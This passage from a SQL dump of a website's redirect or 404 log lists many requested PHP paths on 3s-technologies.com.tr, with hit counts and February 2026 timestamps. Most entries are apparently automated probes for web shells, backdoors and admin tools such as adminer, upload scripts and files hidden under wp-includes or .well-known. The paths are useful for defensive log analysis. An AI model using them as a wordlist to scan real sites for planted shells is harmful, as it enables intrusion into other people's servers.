07:35:36','0000-00-00 00:00:00',301),(57565,'http://3s-technologies.com.tr/tr/yut.php',NULL,'','',1,0,'2026-02-17 07:35:37','0000-00-00 00:00:00',301),(57566,'http://3s-technologies.com.tr/tr/nywmftcj.php',NULL,'','',1,0,'2026-02-17 07:35:40','0000-00-00 00:00:00',301),(57567,'http://3s-technologies.com.tr/tr/ae5val.php',NULL,'','',2,0,'2026-02-17 07:35:44','0000-00-00 00:00:00',301),(57568,'http://3s-technologies.com.tr/tr/entnkm.php',NULL,'','',1,0,'2026-02-17 07:35:47','0000-00-00 00:00:00',301),(57569,'http://3s-technologies.com.tr/tr/extractable-loader-head.php',NULL,'','',1,0,'2026-02-17 07:35:50','0000-00-00 00:00:00',301),(57570,'http://3s-technologies.com.tr/tr/orqdvcag.php',NULL,'','',1,0,'2026-02-17 07:35:56','0000-00-00 00:00:00',301),(57571,'http://3s-technologies.com.tr/tr/zjifnzog.php',NULL,'','',1,0,'2026-02-17 07:35:57','0000-00-00 00:00:00',301),(57572,'http://3s-technologies.com.tr/tr/adminer-4.3.0.php',NULL,'','',1,0,'2026-02-17 07:35:59','0000-00-00 00:00:00',301),(57573,'http://3s-technologies.com.tr/tr/bmlfvgdl.php',NULL,'','',1,0,'2026-02-17 07:36:02','0000-00-00 00:00:00',301),(57574,'http://3s-technologies.com.tr/tr/api_upload.php',NULL,'','',1,0,'2026-02-17 07:36:06','0000-00-00 00:00:00',301),(57575,'http://3s-technologies.com.tr/tr/newsr.php',NULL,'','',1,0,'2026-02-17 07:36:08','0000-00-00 00:00:00',301),(57576,'http://3s-technologies.com.tr/tr/sidebarg.php',NULL,'','',1,0,'2026-02-17 07:36:10','0000-00-00 00:00:00',301),(57577,'http://3s-technologies.com.tr/tr/php_editor.php',NULL,'','',1,0,'2026-02-17 07:36:12','0000-00-00 00:00:00',301),(57578,'http://3s-technologies.com.tr/tr/mirasvit_adminer_425.php',NULL,'','',1,0,'2026-02-17 07:36:15','0000-00-00 00:00:00',301),(57579,'http://3s-technologies.com.tr/tr/yl10gohp.php',NULL,'','',1,0,'2026-02-17 07:36:17','0000-00-00 00:00:00',301),(57580,'http://3s-technologies.com.tr/tr/class-wp-image-editor-imagick-interface.php',NULL,'','',1,0,'2026-02-17 07:36:17','0000-00-00 00:00:00',301),(57581,'http://3s-technologies.com.tr/tr/my.php',NULL,'','',2,0,'2026-02-17 07:36:20','0000-00-00 00:00:00',301),(57582,'http://3s-technologies.com.tr/tr/eq2hbpgs.php',NULL,'','',1,0,'2026-02-17 07:36:21','0000-00-00 00:00:00',301),(57583,'http://3s-technologies.com.tr/tr/down.php',NULL,'','',1,0,'2026-02-17 07:36:23','0000-00-00 00:00:00',301),(57584,'http://3s-technologies.com.tr/tr/ms-upgrade-network.php',NULL,'','',1,0,'2026-02-17 07:36:26','0000-00-00 00:00:00',301),(57585,'http://3s-technologies.com.tr/tr/wficyctk.php',NULL,'','',1,0,'2026-02-17 07:36:28','0000-00-00 00:00:00',301),(57586,'http://3s-technologies.com.tr/tr/mirasvit_adminer-4.2.3.php',NULL,'','',1,0,'2026-02-17 07:36:29','0000-00-00 00:00:00',301),(57587,'http://3s-technologies.com.tr/tr/qaivbilq.php',NULL,'','',1,0,'2026-02-17 07:36:30','0000-00-00 00:00:00',301),(57588,'http://3s-technologies.com.tr/tr/oa1ssiwxzly.php',NULL,'','',1,0,'2026-02-17 07:36:32','0000-00-00 00:00:00',301),(57589,'http://3s-technologies.com.tr/tr/haiterus.php',NULL,'','',1,0,'2026-02-17 07:36:33','0000-00-00 00:00:00',301),(57590,'http://3s-technologies.com.tr/tr/predeploy.php',NULL,'','',1,0,'2026-02-17 07:36:37','0000-00-00 00:00:00',301),(57591,'http://3s-technologies.com.tr/tr/asq.php',NULL,'','',3,0,'2026-02-17 15:30:01','0000-00-00 00:00:00',301),(57592,'http://3s-technologies.com.tr/tr/sidup.php',NULL,'','',3,0,'2026-02-17 15:30:02','0000-00-00 00:00:00',301),(57593,'http://3s-technologies.com.tr/tr/wp-ranku.php',NULL,'','',3,0,'2026-02-17 15:30:04','0000-00-00 00:00:00',301),(57594,'http://3s-technologies.com.tr/tr/handlike.ph',NULL,'','',3,0,'2026-02-18 06:55:29','0000-00-00 00:00:00',301),(57595,'http://3s-technologies.com.tr/tr/6ee8b4/index.php',NULL,'','',1,0,'2026-02-18 06:55:32','0000-00-00 00:00:00',301),(57596,'http://3s-technologies.com.tr/tr/jok3r.php',NULL,'','',1,0,'2026-02-18 06:55:34','0000-00-00 00:00:00',301),(57597,'http://3s-technologies.com.tr/tr/clnfnjna.php',NULL,'','',1,0,'2026-02-18 06:55:37','0000-00-00 00:00:00',301),(57598,'http://3s-technologies.com.tr/tr/jvfsi.php',NULL,'','',1,0,'2026-02-18 06:55:39','0000-00-00 00:00:00',301),(57599,'http://3s-technologies.com.tr/tr/diyxm.php',NULL,'','',1,0,'2026-02-18 06:55:39','0000-00-00 00:00:00',301),(57600,'http://3s-technologies.com.tr/tr/vjkzu.php',NULL,'','',1,0,'2026-02-18 06:55:40','0000-00-00 00:00:00',301),(57601,'http://3s-technologies.com.tr/tr/etmvr.php',NULL,'','',1,0,'2026-02-18 06:55:41','0000-00-00 00:00:00',301),(57602,'http://3s-technologies.com.tr/tr/njrzp.php',NULL,'','',1,0,'2026-02-18 06:55:43','0000-00-00 00:00:00',301),(57603,'http://3s-technologies.com.tr/tr/rcoti.php',NULL,'','',1,0,'2026-02-18 06:55:43','0000-00-00 00:00:00',301),(57604,'http://3s-technologies.com.tr/tr/992.php',NULL,'','',1,0,'2026-02-18 06:55:44','0000-00-00 00:00:00',301),(57605,'http://3s-technologies.com.tr/tr/wp-content/plugins/twenty/login.php',NULL,'','',8,0,'2026-02-18 06:55:45','0000-00-00 00:00:00',301),(57606,'http://3s-technologies.com.tr/tr/pouhg.php',NULL,'','',9,0,'2026-02-18 10:19:11','0000-00-00 00:00:00',301),(57607,'http://3s-technologies.com.tr/tr/vgtyu.php',NULL,'','',6,0,'2026-02-18 10:19:12','0000-00-00 00:00:00',301),(57608,'http://3s-technologies.com.tr/tr/x123.php',NULL,'','',18,0,'2026-02-18 10:19:15','0000-00-00 00:00:00',301),(57609,'http://3s-technologies.com.tr/tr/moshou.php',NULL,'','',10,0,'2026-02-18 10:19:17','0000-00-00 00:00:00',301),(57610,'http://3s-technologies.com.tr/tr/seetox.php',NULL,'','',7,0,'2026-02-18 10:19:18','0000-00-00 00:00:00',301),(57611,'http://3s-technologies.com.tr/tr/ws60.php',NULL,'','',26,0,'2026-02-18 10:19:21','0000-00-00 00:00:00',301),(57612,'http://3s-technologies.com.tr/tr/samiri.php',NULL,'','',3,0,'2026-02-18 10:19:22','0000-00-00 00:00:00',301),(57613,'http://3s-technologies.com.tr/tr/xoot.php',NULL,'','',14,0,'2026-02-18 10:19:24','0000-00-00 00:00:00',301),(57614,'http://3s-technologies.com.tr/tr/file59.php',NULL,'','',44,0,'2026-02-18 10:19:27','0000-00-00 00:00:00',301),(57615,'http://3s-technologies.com.tr/tr/wp-admin/css/bolt.php',NULL,'','',77,0,'2026-02-18 10:19:28','0000-00-00 00:00:00',301),(57616,'http://3s-technologies.com.tr/tr/shas.php',NULL,'','',3,0,'2026-02-18 10:19:29','0000-00-00 00:00:00',301),(57617,'http://3s-technologies.com.tr/tr/xda.php',NULL,'','',24,0,'2026-02-18 10:19:31','0000-00-00 00:00:00',301),(57618,'http://3s-technologies.com.tr/tr/fault.php',NULL,'','',5,0,'2026-02-18 10:19:33','0000-00-00 00:00:00',301),(57619,'http://3s-technologies.com.tr/tr/leuk.php',NULL,'','',5,0,'2026-02-18 10:19:37','0000-00-00 00:00:00',301),(57620,'http://3s-technologies.com.tr/en/postnews.php',NULL,'www.google.com','',1,0,'2026-02-18 19:33:42','0000-00-00 00:00:00',301),(57621,'http://3s-technologies.com.tr/tr/abrand.php',NULL,'','',19,0,'2026-02-18 23:41:37','0000-00-00 00:00:00',301),(57622,'http://3s-technologies.com.tr/tr/ahcc.php',NULL,'','',2,0,'2026-02-18 23:41:38','0000-00-00 00:00:00',301),(57623,'http://3s-technologies.com.tr/tr/vqgii.php',NULL,'','',2,0,'2026-02-18 23:41:39','0000-00-00 00:00:00',301),(57624,'http://3s-technologies.com.tr/tr/jrxzb.php',NULL,'','',2,0,'2026-02-18 23:41:40','0000-00-00 00:00:00',301),(57625,'http://3s-technologies.com.tr/tr/qowaa.php',NULL,'','',2,0,'2026-02-18 23:41:41','0000-00-00 00:00:00',301),(57626,'http://3s-technologies.com.tr/tr/beixl.php',NULL,'','',2,0,'2026-02-18 23:41:42','0000-00-00 00:00:00',301),(57627,'http://3s-technologies.com.tr/tr/lkui.php',NULL,'','',6,0,'2026-02-18 23:41:44','0000-00-00 00:00:00',301),(57628,'http://3s-technologies.com.tr/tr/meew.php',NULL,'','',3,0,'2026-02-18 23:41:46','0000-00-00 00:00:00',301),(57629,'http://3s-technologies.com.tr/tr/71.php',NULL,'','',4,0,'2026-02-18 23:41:47','0000-00-00 00:00:00',301),(57630,'http://3s-technologies.com.tr/tr/timing.php',NULL,'','',1,0,'2026-02-18 23:41:47','0000-00-00 00:00:00',301),(57631,'http://3s-technologies.com.tr/tr/extract.php',NULL,'','',1,0,'2026-02-18 23:41:48','0000-00-00 00:00:00',301),(57632,'http://3s-technologies.com.tr/tr/comp.php',NULL,'','',1,0,'2026-02-18 23:41:48','0000-00-00 00:00:00',301),(57633,'http://3s-technologies.com.tr/tr/blkfqnikz.php',NULL,'','',1,0,'2026-02-18 23:41:52','0000-00-00 00:00:00',301),(57634,'http://3s-technologies.com.tr/tr/ovataumpr.php',NULL,'','',1,0,'2026-02-18 23:41:54','0000-00-00 00:00:00',301),(57635,'http://3s-technologies.com.tr/tr/sh9jq3.php',NULL,'','',1,0,'2026-02-18 23:41:55','0000-00-00 00:00:00',301),(57636,'http://3s-technologies.com.tr/tr/rating.php',NULL,'','',1,0,'2026-02-18 23:41:56','0000-00-00 00:00:00',301),(57637,'http://3s-technologies.com.tr/tr/mfjtrzzg.php',NULL,'','',1,0,'2026-02-18 23:41:57','0000-00-00 00:00:00',301),(57638,'http://3s-technologies.com.tr/tr/style-engine.php',NULL,'','',1,0,'2026-02-18 23:41:57','0000-00-00 00:00:00',301),(57639,'http://3s-technologies.com.tr/tr/report.php',NULL,'','',1,0,'2026-02-18 23:41:58','0000-00-00 00:00:00',301),(57640,'http://3s-technologies.com.tr/tr/cwianpri.php',NULL,'','',1,0,'2026-02-18 23:41:59','0000-00-00 00:00:00',301),(57641,'http://3s-technologies.com.tr/tr/wunaivpl.php',NULL,'','',2,0,'2026-02-18 23:42:00','0000-00-00 00:00:00',301),(57642,'http://3s-technologies.com.tr/tr/gyj.php',NULL,'','',1,0,'2026-02-18 23:42:00','0000-00-00 00:00:00',301),(57643,'http://3s-technologies.com.tr/tr/dfpbtqbc.php',NULL,'','',1,0,'2026-02-18 23:42:03','0000-00-00 00:00:00',301),(57644,'http://3s-technologies.com.tr/tr/ifoklzle.php',NULL,'','',1,0,'2026-02-18 23:42:04','0000-00-00 00:00:00',301),(57645,'http://3s-technologies.com.tr/tr/wlyea.php',NULL,'','',1,0,'2026-02-18 23:42:12','0000-00-00 00:00:00',301),(57646,'http://3s-technologies.com.tr/tr/user_add.php',NULL,'','',1,0,'2026-02-18 23:42:15','0000-00-00 00:00:00',301),(57647,'http://3s-technologies.com.tr/tr/disoxrmons.php',NULL,'','',2,0,'2026-02-18 23:42:15','0000-00-00 00:00:00',301),(57648,'http://3s-technologies.com.tr/tr/se.php',NULL,'','',1,0,'2026-02-18 23:42:20','0000-00-00 00:00:00',301),(57649,'http://3s-technologies.com.tr/tr/class-wp-cmd.php',NULL,'','',1,0,'2026-02-18 23:42:24','0000-00-00 00:00:00',301),(57650,'http://3s-technologies.com.tr/tr/libcore.php',NULL,'','',1,0,'2026-02-18 23:42:25','0000-00-00 00:00:00',301),(57651,'http://3s-technologies.com.tr/tr/bmccxior.php',NULL,'','',1,0,'2026-02-18 23:42:26','0000-00-00 00:00:00',301),(57652,'http://www.3s-technologies.com.tr/tr/tfm.php',NULL,'','',10,0,'2026-02-19 01:50:46','0000-00-00 00:00:00',301),(57653,'http://www.3s-technologies.com.tr/tr/wp-blogs.php',NULL,'','',8,0,'2026-02-19 01:50:47','0000-00-00 00:00:00',301),(57654,'http://www.3s-technologies.com.tr/tr/amp.php',NULL,'','',5,0,'2026-02-19 01:50:47','0000-00-00 00:00:00',301),(57655,'http://www.3s-technologies.com.tr/tr/asax.php',NULL,'','',3,0,'2026-02-19 01:50:48','0000-00-00 00:00:00',301),(57656,'http://www.3s-technologies.com.tr/tr/init.php',NULL,'','',9,0,'2026-02-19 01:50:48','0000-00-00 00:00:00',301),(57657,'http://www.3s-technologies.com.tr/tr/bootstrap.php',NULL,'','',5,0,'2026-02-19 01:50:49','0000-00-00 00:00:00',301),(57658,'http://www.3s-technologies.com.tr/tr/sc.php',NULL,'','',2,0,'2026-02-19 01:50:49','0000-00-00 00:00:00',301),(57659,'http://www.3s-technologies.com.tr/tr/global.php',NULL,'','',4,0,'2026-02-19 01:50:50','0000-00-00 00:00:00',301),(57660,'http://www.3s-technologies.com.tr/tr/black.php',NULL,'','',2,0,'2026-02-19 01:50:51','0000-00-00 00:00:00',301),(57661,'http://www.3s-technologies.com.tr/tr/wp-act.php',NULL,'','',11,0,'2026-02-19 01:51:00','0000-00-00 00:00:00',301),(57662,'http://www.3s-technologies.com.tr/tr/ff1.php',NULL,'','',6,0,'2026-02-19 01:51:00','0000-00-00 00:00:00',301),(57663,'http://www.3s-technologies.com.tr/tr/ws66.php',NULL,'','',6,0,'2026-02-19 01:51:01','0000-00-00 00:00:00',301),(57664,'http://www.3s-technologies.com.tr/tr/h02ugyh.php',NULL,'','',3,0,'2026-02-19 01:51:04','0000-00-00 00:00:00',301),(57665,'http://www.3s-technologies.com.tr/tr/a4.php',NULL,'','',11,0,'2026-02-19 01:51:05','0000-00-00 00:00:00',301),(57666,'http://www.3s-technologies.com.tr/tr/gfd.php',NULL,'','',4,0,'2026-02-19 01:51:07','0000-00-00 00:00:00',301),(57667,'http://www.3s-technologies.com.tr/tr/wefile.php',NULL,'','',2,0,'2026-02-19 01:51:09','0000-00-00 00:00:00',301),(57668,'http://www.3s-technologies.com.tr/tr/edit-tags.php',NULL,'','',2,0,'2026-02-19 01:51:11','0000-00-00 00:00:00',301),(57669,'http://www.3s-technologies.com.tr/tr/core.php',NULL,'','',5,0,'2026-02-19 01:51:13','0000-00-00 00:00:00',301),(57670,'http://www.3s-technologies.com.tr/tr/ccs.php',NULL,'','',7,0,'2026-02-19 01:51:13','0000-00-00 00:00:00',301),(57671,'http://www.3s-technologies.com.tr/tr/apk.php',NULL,'','',1,0,'2026-02-19 01:51:14','0000-00-00 00:00:00',301),(57672,'http://www.3s-technologies.com.tr/tr/bnm.php',NULL,'','',5,0,'2026-02-19 01:51:14','0000-00-00 00:00:00',301),(57673,'http://www.3s-technologies.com.tr/tr/admin-footer.php',NULL,'','',4,0,'2026-02-19 01:51:17','0000-00-00 00:00:00',301),(57674,'http://www.3s-technologies.com.tr/tr/wp-p2r3q9c8k4.php',NULL,'','',9,0,'2026-02-19 01:51:18','0000-00-00 00:00:00',301),(57675,'http://www.3s-technologies.com.tr/tr/tool.php',NULL,'','',8,0,'2026-02-19 01:51:19','0000-00-00 00:00:00',301),(57676,'http://www.3s-technologies.com.tr/tr/callback.php',NULL,'','',2,0,'2026-02-19 01:51:21','0000-00-00 00:00:00',301),(57677,'http://www.3s-technologies.com.tr/tr/logs.php',NULL,'','',2,0,'2026-02-19 01:51:21','0000-00-00 00:00:00',301),(57678,'http://www.3s-technologies.com.tr/tr/aboutc.php',NULL,'','',4,0,'2026-02-19 01:51:22','0000-00-00 00:00:00',301),(57679,'http://www.3s-technologies.com.tr/tr/ajax.php',NULL,'','',2,0,'2026-02-19 01:51:22','0000-00-00 00:00:00',301),(57680,'http://www.3s-technologies.com.tr/tr/xr.php',NULL,'','',3,0,'2026-02-19 01:51:23','0000-00-00 00:00:00',301),(57681,'http://www.3s-technologies.com.tr/tr/knme.php',NULL,'','',1,0,'2026-02-19 01:51:25','0000-00-00 00:00:00',301),(57682,'http://www.3s-technologies.com.tr/tr/ws71.php',NULL,'','',1,0,'2026-02-19 01:51:26','0000-00-00 00:00:00',301),(57683,'http://www.3s-technologies.com.tr/tr/ws67.php',NULL,'','',2,0,'2026-02-19 01:51:27','0000-00-00 00:00:00',301),(57684,'http://www.3s-technologies.com.tr/tr/momo.php',NULL,'','',1,0,'2026-02-19 01:51:27','0000-00-00 00:00:00',301),(57685,'http://3s-technologies.com.tr/tr/new99.php',NULL,'','',1,0,'2026-02-19 10:19:25','0000-00-00 00:00:00',301),(57686,'http://mail.3s-technologies.com.tr/tr/capcha/font/favicon.php',NULL,'','',1,0,'2026-02-19 15:51:43','0000-00-00 00:00:00',301),(57687,'http://mail.3s-technologies.com.tr/tr/cache/f/a/a/h/wp-blog.php',NULL,'','',1,0,'2026-02-19 15:51:44','0000-00-00 00:00:00',301),(57688,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/src/services/wp-blog.php',NULL,'','',1,0,'2026-02-19 15:51:45','0000-00-00 00:00:00',301),(57689,'http://mail.3s-technologies.com.tr/tr/images/all2.php',NULL,'','',1,0,'2026-02-19 15:51:47','0000-00-00 00:00:00',301),(57690,'http://mail.3s-technologies.com.tr/tr/main1/favicon.php',NULL,'','',1,0,'2026-02-19 15:51:49','0000-00-00 00:00:00',301),(57691,'http://mail.3s-technologies.com.tr/tr/wp-includes/phpmailer/index.php',NULL,'','',6,0,'2026-02-19 15:51:50','0000-00-00 00:00:00',301),(57692,'http://mail.3s-technologies.com.tr/tr/randkeyword.php7',NULL,'','',8,0,'2026-02-19 15:51:55','0000-00-00 00:00:00',301),(57693,'http://mail.3s-technologies.com.tr/tr/vendor/ramsey/uuid/about.php',NULL,'','',1,0,'2026-02-19 15:51:57','0000-00-00 00:00:00',301),(57694,'http://mail.3s-technologies.com.tr/tr/font/cache.php',NULL,'','',1,0,'2026-02-19 15:51:58','0000-00-00 00:00:00',301),(57695,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2023/wp-casper.php',NULL,'','',1,0,'2026-02-19 15:51:59','0000-00-00 00:00:00',301),(57696,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/too.php',NULL,'','',1,0,'2026-02-19 15:52:01','0000-00-00 00:00:00',301),(57697,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/wpputty/wpputty.php',NULL,'','',1,0,'2026-02-19 15:52:04','0000-00-00 00:00:00',301),(57698,'http://mail.3s-technologies.com.tr/tr/images/indes.php',NULL,'','',1,0,'2026-02-19 15:52:07','0000-00-00 00:00:00',301),(57699,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/credits-all.php',NULL,'','',1,0,'2026-02-19 15:52:08','0000-00-00 00:00:00',301),(57700,'http://mail.3s-technologies.com.tr/tr/main3/capcha/font/favicon.php',NULL,'','',1,0,'2026-02-19 15:52:11','0000-00-00 00:00:00',301),(57701,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/class-wp-privacy-requests-table-method.php',NULL,'','',1,0,'2026-02-19 15:52:12','0000-00-00 00:00:00',301),(57702,'http://mail.3s-technologies.com.tr/tr/.well-known/autoconfig/atomlib.php',NULL,'','',1,0,'2026-02-19 15:52:12','0000-00-00 00:00:00',301),(57703,'http://mail.3s-technologies.com.tr/tr/xss/about.php7',NULL,'','',1,0,'2026-02-19 15:52:14','0000-00-00 00:00:00',301),(57704,'http://mail.3s-technologies.com.tr/tr/simple/function.php',NULL,'','',1,0,'2026-02-19 15:52:16','0000-00-00 00:00:00',301),(57705,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/f35.php',NULL,'','',1,0,'2026-02-19 15:52:17','0000-00-00 00:00:00',301),(57706,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/bak.php',NULL,'','',1,0,'2026-02-19 15:52:20','0000-00-00 00:00:00',301),(57707,'http://mail.3s-technologies.com.tr/tr/wp-includes/buy.php',NULL,'','',1,0,'2026-02-19 15:52:21','0000-00-00 00:00:00',301),(57708,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/wp-includes/pomo/about.php',NULL,'','',1,0,'2026-02-19 15:52:22','0000-00-00 00:00:00',301),(57709,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/client-dashboard.php',NULL,'','',1,0,'2026-02-19 15:52:23','0000-00-00 00:00:00',301),(57710,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/wpr-addons/forms/copypaths.php',NULL,'','',1,0,'2026-02-19 15:52:24','0000-00-00 00:00:00',301),(57711,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/getid3s.php',NULL,'','',1,0,'2026-02-19 15:52:25','0000-00-00 00:00:00',301),(57712,'http://mail.3s-technologies.com.tr/tr/assets/lufix.php',NULL,'','',1,0,'2026-02-19 15:52:26','0000-00-00 00:00:00',301),(57713,'http://mail.3s-technologies.com.tr/tr/vendor/wp-login.php',NULL,'','',1,0,'2026-02-19 15:52:27','0000-00-00 00:00:00',301),(57714,'http://mail.3s-technologies.com.tr/tr/chosen/function.php',NULL,'','',4,0,'2026-02-19 15:52:28','0000-00-00 00:00:00',301),(57715,'http://mail.3s-technologies.com.tr/tr/wp-includes/admin.php',NULL,'','',12,0,'2026-02-19 15:52:31','0000-00-00 00:00:00',301),(57716,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/decode/admin.php',NULL,'','',1,0,'2026-02-19 15:52:32','0000-00-00 00:00:00',301),(57717,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/js_composer/index.php',NULL,'','',1,0,'2026-02-19 15:52:35','0000-00-00 00:00:00',301),(57718,'http://mail.3s-technologies.com.tr/tr/wp-cache.php',NULL,'','',2,0,'2026-02-19 15:52:36','0000-00-00 00:00:00',301),(57719,'http://mail.3s-technologies.com.tr/tr/images/index1.php',NULL,'','',1,0,'2026-02-19 15:52:37','0000-00-00 00:00:00',301),(57720,'http://mail.3s-technologies.com.tr/tr/js/upload.php',NULL,'','',1,0,'2026-02-19 15:52:37','0000-00-00 00:00:00',301),(57721,'http://mail.3s-technologies.com.tr/tr/wp-content/cache/page/index.php',NULL,'','',1,0,'2026-02-19 15:52:39','0000-00-00 00:00:00',301),(57722,'http://mail.3s-technologies.com.tr/tr/images/contacto.php',NULL,'','',1,0,'2026-02-19 15:52:40','0000-00-00 00:00:00',301),(57723,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/aboud.php',NULL,'','',1,0,'2026-02-19 15:52:41','0000-00-00 00:00:00',301),(57724,'http://mail.3s-technologies.com.tr/tr/ioxi002.php',NULL,'','',1,0,'2026-02-19 15:52:42','0000-00-00 00:00:00',301),(57725,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/lint-branch.php',NULL,'','',1,0,'2026-02-19 15:52:44','0000-00-00 00:00:00',301),(57726,'http://mail.3s-technologies.com.tr/tr/css/upload.php',NULL,'','',1,0,'2026-02-19 15:52:44','0000-00-00 00:00:00',301),(57727,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/2018/03/ab.php',NULL,'','',1,0,'2026-02-19 15:52:45','0000-00-00 00:00:00',301),(57728,'http://mail.3s-technologies.com.tr/tr/css/wp-blog.php',NULL,'','',1,0,'2026-02-19 15:52:46','0000-00-00 00:00:00',301),(57729,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/gaukingo/db.php',NULL,'','',1,0,'2026-02-19 15:52:47','0000-00-00 00:00:00',301),(57730,'http://mail.3s-technologies.com.tr/tr/resources/cache.php',NULL,'','',1,0,'2026-02-19 15:52:49','0000-00-00 00:00:00',301),(57731,'http://mail.3s-technologies.com.tr/tr/.well-known/wp-login.php',NULL,'','',4,0,'2026-02-19 15:52:52','0000-00-00 00:00:00',301),(57732,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/index.php',NULL,'','',7,0,'2026-02-19 15:52:52','0000-00-00 00:00:00',301),(57733,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentytwenty/404.php',NULL,'','',5,0,'2026-02-19 15:52:55','0000-00-00 00:00:00',301),(57734,'http://mail.3s-technologies.com.tr/tr/wp-includes/cs.php',NULL,'','',1,0,'2026-02-19 15:52:56','0000-00-00 00:00:00',301),(57735,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/singlex.php',NULL,'','',1,0,'2026-02-19 15:52:57','0000-00-00 00:00:00',301),(57736,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/data.php',NULL,'','',1,0,'2026-02-19 15:52:59','0000-00-00 00:00:00',301),(57737,'http://mail.3s-technologies.com.tr/tr/wp-content/cache/about.php',NULL,'','',1,0,'2026-02-19 15:53:01','0000-00-00 00:00:00',301),(57738,'http://mail.3s-technologies.com.tr/tr/main1/index2.php',NULL,'','',1,0,'2026-02-19 15:53:04','0000-00-00 00:00:00',301),(57739,'http://mail.3s-technologies.com.tr/tr/.well-known/nam.php',NULL,'','',1,0,'2026-02-19 15:53:06','0000-00-00 00:00:00',301),(57740,'http://mail.3s-technologies.com.tr/tr/.well-known/cflsintdaf.php',NULL,'','',1,0,'2026-02-19 15:53:09','0000-00-00 00:00:00',301),(57741,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/file.php',NULL,'','',8,0,'2026-02-19 15:53:10','0000-00-00 00:00:00',301),(57742,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/browser.php',NULL,'','',1,0,'2026-02-19 15:53:11','0000-00-00 00:00:00',301),(57743,'http://mail.3s-technologies.com.tr/tr/wp-includes/phpmailer/admin.php',NULL,'','',1,0,'2026-02-19 15:53:13','0000-00-00 00:00:00',301),(57744,'http://mail.3s-technologies.com.tr/tr/wp-includes/author-template-less.php',NULL,'','',1,0,'2026-02-19 15:53:13','0000-00-00 00:00:00',301),(57745,'http://mail.3s-technologies.com.tr/tr/favicon.php',NULL,'','',6,0,'2026-02-19 15:53:16','0000-00-00 00:00:00',301),(57746,'http://mail.3s-technologies.com.tr/tr/themes/db.php',NULL,'','',1,0,'2026-02-19 15:53:18','0000-00-00 00:00:00',301),(57747,'http://mail.3s-technologies.com.tr/tr/mod/assign/favicon.php',NULL,'','',1,0,'2026-02-19 15:53:20','0000-00-00 00:00:00',301),(57748,'http://www.3s-technologies.com.tr/tr/capcha/font/favicon.php',NULL,'','',1,0,'2026-02-19 19:42:29','0000-00-00 00:00:00',301),(57749,'http://www.3s-technologies.com.tr/tr/cache/f/a/a/h/wp-blog.php',NULL,'','',1,0,'2026-02-19 19:42:31','0000-00-00 00:00:00',301),(57750,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wordpress-seo/src/services/wp-blog.php',NULL,'','',1,0,'2026-02-19 19:42:31','0000-00-00 00:00:00',301),(57751,'http://www.3s-technologies.com.tr/tr/wp-includes/class-wp-dependency-get.php',NULL,'','',1,0,'2026-02-19 19:42:32','0000-00-00 00:00:00',301),(57752,'http://www.3s-technologies.com.tr/tr/images/all2.php',NULL,'','',1,0,'2026-02-19 19:42:34','0000-00-00 00:00:00',301),(57753,'http://www.3s-technologies.com.tr/tr/main1/favicon.php',NULL,'','',1,0,'2026-02-19 19:42:38','0000-00-00 00:00:00',301),(57754,'http://www.3s-technologies.com.tr/tr/wp-includes/phpmailer/index.php',NULL,'','',2,0,'2026-02-19 19:42:39','0000-00-00 00:00:00',301),(57755,'http://www.3s-technologies.com.tr/tr/vendor/ramsey/uuid/about.php',NULL,'','',1,0,'2026-02-19 19:42:46','0000-00-00 00:00:00',301),(57756,'http://www.3s-technologies.com.tr/tr/font/cache.php',NULL,'','',1,0,'2026-02-19 19:42:47','0000-00-00 00:00:00',301),(57757,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2023/wp-casper.php',NULL,'','',1,0,'2026-02-19 19:42:48','0000-00-00 00:00:00',301),(57758,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/wpputty/wpputty.php',NULL,'','',1,0,'2026-02-19 19:42:56','0000-00-00 00:00:00',301),(57759,'http://www.3s-technologies.com.tr/tr/images/indes.php',NULL,'','',1,0,'2026-02-19 19:42:59','0000-00-00 00:00:00',301),(57760,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/credits-all.php',NULL,'','',1,0,'2026-02-19 19:43:01','0000-00-00 00:00:00',301),(57761,'http://www.3s-technologies.com.tr/tr/wp-content/uploads/2024/dodo.php',NULL,'','',1,0,'2026-02-19 19:43:03','0000-00-00 00:00:00',301),(57762,'http://www.3s-technologies.com.tr/tr/main3/capcha/font/favicon.php',NULL,'','',1,0,'2026-02-19 19:43:04','0000-00-00 00:00:00',301),(57763,'http://www.3s-technologies.com.tr/tr/wp-admin/includes/class-wp-privacy-requests-table-method.php',NULL,'','',1,0,'2026-02-19 19:43:05','0000-00-00 00:00:00',301),(57764,'http://www.3s-technologies.com.tr/tr/.well-known/autoconfig/atomlib.php',NULL,'','',1,0,'2026-02-19 19:43:06','0000-00-00 00:00:00',301),(57765,'http://www.3s-technologies.com.tr/tr/xss/about.php7',NULL,'','',1,0,'2026-02-19 19:43:08','0000-00-00 00:00:00',301),(57766,'http://www.3s-technologies.com.tr/tr/simple/function.php',NULL,'','',1,0,'2026-02-19 19:43:10','0000-00-00 00:00:00',301),(57767,'http://www.3s-technologies.com.tr/tr/wp-content/upgrade/f35.php',NULL,'','',1,0,'2026-02-19 19:43:11','0000-00-00 00:00:00',301),(57768,'http://www.3s-technologies.com.tr/tr/.well-known/acme-challenge/bak.php',NULL,'','',1,0,'2026-02-19 